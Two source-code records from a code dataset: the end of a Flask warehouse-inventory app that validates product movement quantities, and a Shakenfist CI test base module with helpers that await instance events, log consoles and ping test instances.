redirect('/movement')\n\t\t\tif int(product_qty) == 0 or int(product_qty) < 0: # qty cant 0\n\t\t\t\tvalid = False\n\t\t\t\tflash(f\"Please add quantity !\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\t\n\t\t\t\n\t\t\tif from_location == \"---\": #min quantity according to future \n\n\t\t\t\tif future_sum_qty != 0:\n\t\t\t\t\tif int(product_qty) >= int(future_sum_qty):\n\t\t\t\t\t\tvalid = True\n\t\t\t\t\telse :\n\t\t\t\t\t\tvalid=False\n\t\t\t\t\t\tflash(f\"Please add atleast {future_sum_qty} quantity of {product_name} at '{to_location}' Warehouse !\", \"danger\")\n\t\t\t\t\t\treturn redirect('/movement')\n\t\t\t\t\n\t\t\tif (future_sum_qty) == 0:\n\n\t\t\t\tif int(product_qty) <= past_sum_qty: # past>qty>future\n\t\t\t\t\tvalid=True\t\t\n\t\t\t\telif int(product_qty) > past_sum_qty and from_location != '---': #past past_sum_qty or int(product_qty) > future_sum_qty) and from_location != '---':\n\t\t\t\t\tflash(f\" Please enter quantity less than {past_sum_qty} for '{from_location}' to {to_location} movement !\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\n\t\t\telif int(product_qty) <= past_sum_qty and int(product_qty) >= future_sum_qty :\n\t\t\t\tvalid=True\n\n\t\t\telif past_sum_qty <= int(product_qty) and from_location == \"---\" and int(product_qty) >= future_sum_qty :\n\t\t\t\tvalid=True\n\t\t\telse:\n\t\t\t\tif int(product_qty) > past_sum_qty and int(product_qty) < future_sum_qty:\n\t\t\t\t\tvalid=False\n\t\t\t\t\tflash(f\" Please enter quantity {past_sum_qty} or less than {past_sum_qty} for '{from_location}' to {to_location} movement !\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telif int(product_qty) < past_sum_qty and int(product_qty) < future_sum_qty:\n\t\t\t\t\tvalid=False\n\t\t\t\t\tflash(f\"Please add atleast {future_sum_qty} quantity of {product_name} for '{from_location}' to {to_location} movement !\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telse:\n\t\t\t\t\tvalid=False\n\t\t\t\t\tif past_sum_qty > future_sum_qty:\n\t\t\t\t\t\tflash(f\" Please enter quantity {past_sum_qty} or less than {past_sum_qty} for '{from_location}' to {to_location} movement !\", \"danger\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tflash(f\" Please enter quantity between {past_sum_qty} to {future_sum_qty} for '{from_location}' to {to_location} movement !\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\n\t\t\tif valid :\n\t\t\t\tedit_movement.product_id=product_details.id\n\t\t\t\tedit_movement.product_name=product_details.name\n\t\t\t\tedit_movement.from_location=from_location\n\t\t\t\tedit_movement.to_location=to_location\n\t\t\t\tedit_movement.product_qty=product_qty\n\t\t\t\tedit_movement.date_updated = datetime.utcnow()\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{edit_movement.product_name}' movement is successfully edited!\", \"success\")\n\t\t\t\treturn redirect('/movement')\n\n\n\n\telse:\n\t\tall_product = Product.query.all()\n\t\tall_location = Location.query.all()\n\t\tall_movement = ProductMovement.query.filter_by(Flag=\"A\").order_by(ProductMovement.id).all()\n\t\tmessage=None\n\t\tif not all_movement:\n\t\t\tmessage = \"Currently Data is unavailable.Add Now!\"\n\t\treturn render_template('movement.html',products=all_product,locations=all_location,movements=all_movement,message=message)\n\t\n\t\n\ndef get_total(product, location,movement=None,process=None):\n\timported = 0\n\texported = 0\n\t\n\tif movement is None:\n\t\timported_items = get_import_data(product,location)\n\telse:\n\t\timported_items = get_import_data(product,location,movement,process)\n\tif imported_items:\n\t\tfor item in imported_items:\n\t\t\timported +=item.product_qty\n\tif movement is None:\n\t\texported_items = get_export_data(product,location)\n\telse :\n\t\texported_items = get_export_data(product,location,movement,process)\n\tif exported_items:\n\t\t\tfor item in exported_items:\n\t\t\t\texported += item.product_qty\n\n\tif exported > imported:\n\t\ttotal = exported - imported\n\telse:\n\t\ttotal = imported - exported\n\treturn total\n\n\ndef get_import_data(product, location,movement=None,process=None):\n\tif movement is not None:\n\t\tif process == 'past':\n\t\t\timported = ProductMovement.query.filter(ProductMovement.id < movement , ProductMovement.product_name == product ,ProductMovement.to_location == location ,ProductMovement.Flag =='A')\n\t\tif process == 'future':\n\t\t\timported = ProductMovement.query.filter(ProductMovement.id > movement , ProductMovement.product_name == product ,ProductMovement.to_location == location ,ProductMovement.Flag =='A')\n\telse:\n\t\timported = ProductMovement.query.filter_by(product_name=product).filter_by(to_location=location).filter_by(Flag='A').all()\n\n\treturn imported\n\ndef get_export_data(product, location,movement=None,process=None):\n\tif movement is not None:\n\t\tif process == 'past':\n\t\t\texported = ProductMovement.query.filter(ProductMovement.id < movement , ProductMovement.product_name == product ,ProductMovement.from_location == location ,ProductMovement.Flag =='A')\n\t\t\treturn exported\n\t\tif process == 'future':\n\t\t\texported = ProductMovement.query.filter(ProductMovement.id > movement , ProductMovement.product_name == product ,ProductMovement.from_location == location ,ProductMovement.Flag =='A')\n\t\t\treturn exported\n\telse:\n\t\texported = ProductMovement.query.filter_by(product_name=product).filter_by(from_location=location).filter_by(Flag='A').all()\n\t\treturn exported\n\t\n\ndef get_data(process=None):\n\tall_data=[]\n\tproducts = Product.query.all()\n\tlocations = Location.query.all()\n\ttotal_qty = 0\n\t\n\tif process==\"product\":\n\n\t\tfor product in products:\n\t\t\tdata = {}\n\t\t\tprod_name = product.name\n\t\t\tprod_id = product.id\n\t\t\tdata['id'] = prod_id\n\t\t\tdata['name'] = prod_name\n\t\t\tfor location in locations:\n\t\t\t\tloc_name = location.name\n\t\t\t\ttotal = get_total(prod_name,loc_name)\n\t\t\t\tif total == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\t total_qty += total\n\t\t\tif total_qty == 0 :\n\t\t\t\tdata['available_quantity'] = '---'\n\t\t\telse :\n\t\t\t\tdata['available_quantity'] = total_qty\n\t\t\ttotal_qty=0\n\t\t\tall_data.append(data)\n\t\treturn all_data\n\t\n\telif process == \"location\":\n\t\tfor location in locations:\n\t\t\tdata = {}\n\t\t\tprod_data = []\n\t\t\tloc_name = location.name\n\t\t\tloc_id = location.id\n\t\t\tdata['id'] = loc_id\n\t\t\tdata['name'] = loc_name\n\t\t\tfor product in products:\n\t\t\t\t\n\t\t\t\tprod_name = product.name\n\t\t\t\ttotal = get_total(prod_name,loc_name)\n\t\t\t\t\n\t\t\t\tif total == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tprod_data.append(prod_name)\n\t\t\t\t\t\n\t\t\tres = str(prod_data)[1:-1]\n\t\t\tres = res.replace(\"'\", \"\")\n\t\t\tdata['prod_list']=res\n\t\t\tall_data.append(data)\n\t\treturn all_data\n\telse:\n\n\t\tfor product in products:\n\t\t\tfor location in locations:\n\t\t\t\tdata = {}\n\t\t\t\tprod_name = product.name\n\t\t\t\tloc_name = location.name\n\t\t\t\ttotal = get_total(prod_name,loc_name)\n\t\t\t\t\n\t\t\t\tif total == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tdata['product'] = prod_name\n\t\t\t\t\tdata['location'] = loc_name\n\t\t\t\t\tdata['available_quantity'] = total\n\t\t\t\tall_data.append(data)\n\t\treturn all_data\n\n\n\n\nif __name__=='__main__':\n\tapp.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147759451","text":"import datetime\nimport random\nfrom socket import error as socket_error\nimport string\nimport sys\nimport testtools\nimport telnetlib\nimport time\n\nfrom oslo_concurrency import processutils\nfrom prettytable import PrettyTable\nfrom shakenfist_client import apiclient\n\n\nclass TimeoutException(Exception):\n pass\n\n\nclass StartException(Exception):\n pass\n\n\nclass WrongEventException(Exception):\n pass\n\n\n# NOTE(mikal): this is a hack to \"turn up the knob\" on how slow image\n# downloads can be while my ISP is congested because of COVID. We should\n# turn this back down as things improve.\nNETWORK_PATIENCE_FACTOR = 3\n\n\nclass BaseTestCase(testtools.TestCase):\n def setUp(self):\n super(BaseTestCase, self).setUp()\n\n self.system_client = apiclient.Client(\n async_strategy=apiclient.ASYNC_PAUSE)\n\n def _make_namespace(self, name, key):\n self._remove_namespace(name)\n\n self.system_client.create_namespace(name)\n self.system_client.add_namespace_key(name, 'test', key)\n return apiclient.Client(\n base_url=self.system_client.base_url,\n namespace=name, key=key,\n async_strategy=apiclient.ASYNC_PAUSE)\n\n def _remove_namespace(self, name):\n ns = self.system_client.get_namespaces()\n if name in ns:\n self.system_client.delete_namespace(name)\n\n def _uniquifier(self):\n return ''.join(random.choice(string.ascii_lowercase) for i in range(8))\n\n def _log_console(self, instance_uuid):\n \"\"\" Log the console of the instance so that we can debug. \"\"\"\n sys.stderr.write(\n '----------------------- start %s console -----------------------\\n'\n % instance_uuid)\n for line in self.system_client.get_console_data(instance_uuid, -1).split('\\n'):\n sys.stderr.write('Instance console: %s\\n' % line)\n sys.stderr.write(\n '----------------------- end %s console -----------------------\\n'\n % instance_uuid)\n\n def _log_instance_events(self, instance_uuid):\n # If we've failed, log all events and then raise an exception\n self._log_events(instance_uuid,\n self.system_client.get_instance_events(instance_uuid))\n\n def _log_image_events(self, image_uuid):\n self._log_events(\n image_uuid, self.system_client.get_artifact_events(image_uuid))\n\n def _log_events(self, uuid, event_source):\n x = PrettyTable()\n x.field_names = ['timestamp', 'node',\n 'operation', 'phase', 'duration', 'message']\n for e in event_source:\n e['timestamp'] = datetime.datetime.fromtimestamp(e['timestamp'])\n x.add_row([e['timestamp'], e['fqdn'], e['operation'], e['phase'],\n e['duration'], e['message']])\n\n sys.stderr.write(\n '----------------------- start %s events -----------------------\\n'\n % uuid)\n sys.stderr.write(str(x))\n sys.stderr.write('\\n')\n sys.stderr.write(\n '----------------------- end %s events -----------------------\\n'\n % uuid)\n\n def _log_netns(self):\n \"\"\"Log the current net namespaces.\"\"\"\n sys.stderr.write(\n '----------------------- netns -----------------------\\n')\n out, err = processutils.execute('sudo ip netns', shell=True,\n check_exit_code=[0, 1])\n for line in out:\n sys.stderr.write(line)\n sys.stderr.write(\n '----------------------- end netns -----------------------\\n')\n\n def _await_power_off(self, instance_uuid, after=None):\n return self._await_instance_event(\n instance_uuid, 'detected poweroff', after=after)\n\n def _await_login_prompt(self, instance_uuid, after=None):\n return self._await_instance_event(\n instance_uuid, 'trigger', 'login prompt', after)\n\n def _await_cloud_init_complete(self, instance_uuid, after=None):\n return self._await_instance_event(\n instance_uuid, 'trigger', 'cloud-init complete', after)\n\n def _await_instance_event(\n self, instance_uuid, operation, message=None, after=None):\n # Wait up to 5 minutes for the instance to be created. On a slow\n # morning it can take over 2 minutes to download a Ubuntu image.\n start_time = time.time()\n final = False\n while time.time() - start_time < 5 * 60 * NETWORK_PATIENCE_FACTOR:\n i = self.system_client.get_instance(instance_uuid)\n if i['state'] in ['created', 'error']:\n final = True\n break\n time.sleep(5)\n\n if i['state'] == 'error':\n raise StartException(\n 'Instance %s failed to start (marked as error state, %s)'\n % (instance_uuid, i))\n\n if not final:\n raise TimeoutException(\n 'Instance %s was not created in a reasonable time (%s)'\n % (instance_uuid, i))\n\n # Once created, we shouldn't need more than another 2 minutes for boot.\n start_time = time.time()\n while time.time() - start_time < 2 * 60:\n for event in self.system_client.get_instance_events(instance_uuid):\n if after and event['timestamp'] <= after:\n continue\n\n if (event['operation'] == operation and\n (not message or event['message'] == message)):\n return event['timestamp']\n\n time.sleep(5)\n\n # If this is a login prompt, then try mashing the console keyboard\n if message == 'login prompt':\n try:\n s = telnetlib.Telnet(i['node'], i['console_port'], 30)\n s.write('\\n'.encode('ascii'))\n s.close()\n except socket_error:\n pass\n\n self._log_console(instance_uuid)\n self._log_instance_events(instance_uuid)\n raise TimeoutException(\n 'After time %s, instance %s had no event \"%s:%s\" (waited 10 mins)' % (\n after, instance_uuid, operation, message))\n\n def _await_image_download_success(self, image_uuid, after=None):\n return self._await_image_event(image_uuid, 'fetch', 'success', after)\n\n def _await_image_download_error(self, image_uuid, after=None):\n return self._await_image_event(\n image_uuid, 'fetch', 'DNS error', after)\n\n def _await_image_event(\n self, image_uuid, operation, message=None, after=None):\n start_time = time.time()\n while time.time() - start_time < 5 * 60 * NETWORK_PATIENCE_FACTOR:\n for event in self.system_client.get_artifact_events(image_uuid):\n if after and event['timestamp'] <= after:\n continue\n\n if event['operation'] == operation:\n if message in str(event['message']):\n return event['timestamp']\n\n self._log_image_events(image_uuid)\n raise WrongEventException(\n 'After time %s, image %s expected event \"%s:%s\" got %s'\n % (after, image_uuid, operation, message, event['message']))\n\n time.sleep(5)\n\n self._log_image_events(image_uuid)\n raise TimeoutException(\n 'After time %s, image %s had no event type \"%s\" (waited 5 mins)'\n % (after, image_uuid, operation))\n\n def _await_network_ready(self, network_uuid):\n start_time = time.time()\n while time.time() - start_time < 2 * 60:\n n = self.system_client.get_network(network_uuid)\n if n.get('state') == 'created':\n return\n time.sleep(5)\n\n raise TimeoutException(\n 'Network %s never became ready (waited 5 mins)' % network_uuid)\n\n def _test_ping(self, instance_uuid, network_uuid, ip, expected, attempts=1):\n while attempts:\n sys.stderr.write(' _test_ping() attempts=%s\\n' % attempts)\n attempts -= 1\n output = self.system_client.ping(network_uuid, ip)\n\n actual = output.get('stdout').find(' 0% packet loss') != -1\n if actual == expected:\n break\n\n # Almost unnecessary due to the slowness of execute()\n time.sleep(1)\n\n if expected != actual:\n self._log_console(instance_uuid)\n self._log_instance_events(instance_uuid)\n self._log_netns()\n sys.stderr.write('Current time: '+time.ctime()+'\\n')\n self.fail('Ping test failed. Expected %s != actual %s.\\nout: %s\\nerr: %s\\n'\n % (expected, actual, output['stdout'], output['stderr']))\n\n\nclass BaseNamespacedTestCase(BaseTestCase):\n def __init__(self, *args, **kwargs):\n namespace_prefix = kwargs.get('namespace_prefix')\n del kwargs['namespace_prefix']\n self.namespace = 'ci-%s-%s' % (namespace_prefix,\n self._uniquifier())\n self.namespace_key = self._uniquifier()\n\n super(BaseNamespacedTestCase, self).__init__(*args, **kwargs)\n\n def setUp(self):\n super(BaseNamespacedTestCase, self).setUp()\n self.test_client = self._make_namespace(\n self.namespace, self.namespace_key)\n\n def tearDown(self):\n super(BaseNamespacedTestCase, self).tearDown()\n\n non_blocking_client = apiclient.Client(\n base_url=self.system_client.base_url,\n namespace=self.namespace, key=self.namespace_key,\n async_strategy=apiclient.ASYNC_CONTINUE)\n for inst in non_blocking_client.get_instances():\n non_blocking_client.delete_instance(inst['uuid'])\n\n start_time = time.time()\n while time.time() - start_time < 5 * 60:\n if not list(non_blocking_client.get_instances()):\n break\n time.sleep(5)\n\n remaining_instances = list(non_blocking_client.get_instances())\n if remaining_instances:\n self.fail('Failed to delete instances: %s'\n % remaining_instances)\n\n for net in non_blocking_client.get_networks():\n non_blocking_client.delete_network(net['uuid'])\n\n start_time = time.time()\n while time.time() - start_time < 5 * 60:\n if not list(non_blocking_client.get_networks()):\n break\n time.sleep(5)\n\n remaining_networks = list(non_blocking_client.get_networks())\n if remaining_networks:\n self.fail('Failed to delete networks: %s'\n % remaining_networks)\n\n self._remove_namespace(self.namespace)\n\n\nclass TestDistroBoots(BaseNamespacedTestCase):\n def setUp(self):\n super(TestDistroBoots, self).setUp()\n self.net = self.test_client.allocate_network(\n '192.168.242.0/24', True, True, '%s-net' % self.namespace)\n self._await_network_ready(self.net['uuid'])\n\n def _test_distro_boot(self, base_image):\n inst = self.test_client.create_instance(\n base_image.replace(':', '-').replace('.', ''), 1, 1024,\n [\n {\n 'network_uuid': self.net['uuid']\n }\n ],\n [\n {\n 'size': 8,\n 'base': base_image,\n 'type': 'disk'\n }\n ], None, None)\n\n self._await_login_prompt(inst['uuid'])\n\n ip = self.test_client.get_instance_interfaces(inst['uuid'])[0]['ipv4']\n self._test_ping(inst['uuid'], self.net['uuid'], ip, True)\n\n self.test_client.delete_instance(inst['uuid'])\n inst_uuids = []\n for i in self.test_client.get_instances():\n inst_uuids.append(i['uuid'])\n self.assertNotIn(inst['uuid'], inst_uuids)\n\n\nclass LoggingSocket(object):\n ctrlc = '\\x03'\n\n def __init__(self, host, port):\n attempts = 5\n while attempts:\n try:\n attempts -= 1\n self.s = telnetlib.Telnet(host, port, 30)\n return\n\n except ConnectionRefusedError:\n print('!! Connection refused, retrying')\n time.sleep(5)\n\n raise ConnectionRefusedError(\n 'Repeated telnet connection attempts failed: host=%s port=%s' %\n (host, port))\n\n def ensure_fresh(self):\n for d in [self.ctrlc, self.ctrlc, '\\nexit\\n', 'cirros\\n', 'gocubsgo\\n']:\n self.send(d)\n time.sleep(0.5)\n self.recv()\n\n def send(self, data):\n print('>> %s' % data.replace('\\n', '\\\\n').replace('\\r', '\\\\r'))\n self.s.write(data.encode('ascii'))\n\n def recv(self):\n data = self.s.read_eager().decode('ascii')\n for line in data.split('\\n'):\n print('<< %s' % line.replace('\\n', '\\\\n').replace('\\r', '\\\\r'))\n return data\n\n def execute(self, cmd):\n self.ensure_fresh()\n self.send(cmd + '\\n')\n time.sleep(5)\n d = ''\n\n reads = 0\n while not d.endswith('\\n$ '):\n d += self.recv()\n reads += 1\n\n if reads > 10:\n break\n return d\n","sub_path":"deploy/shakenfist_ci/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}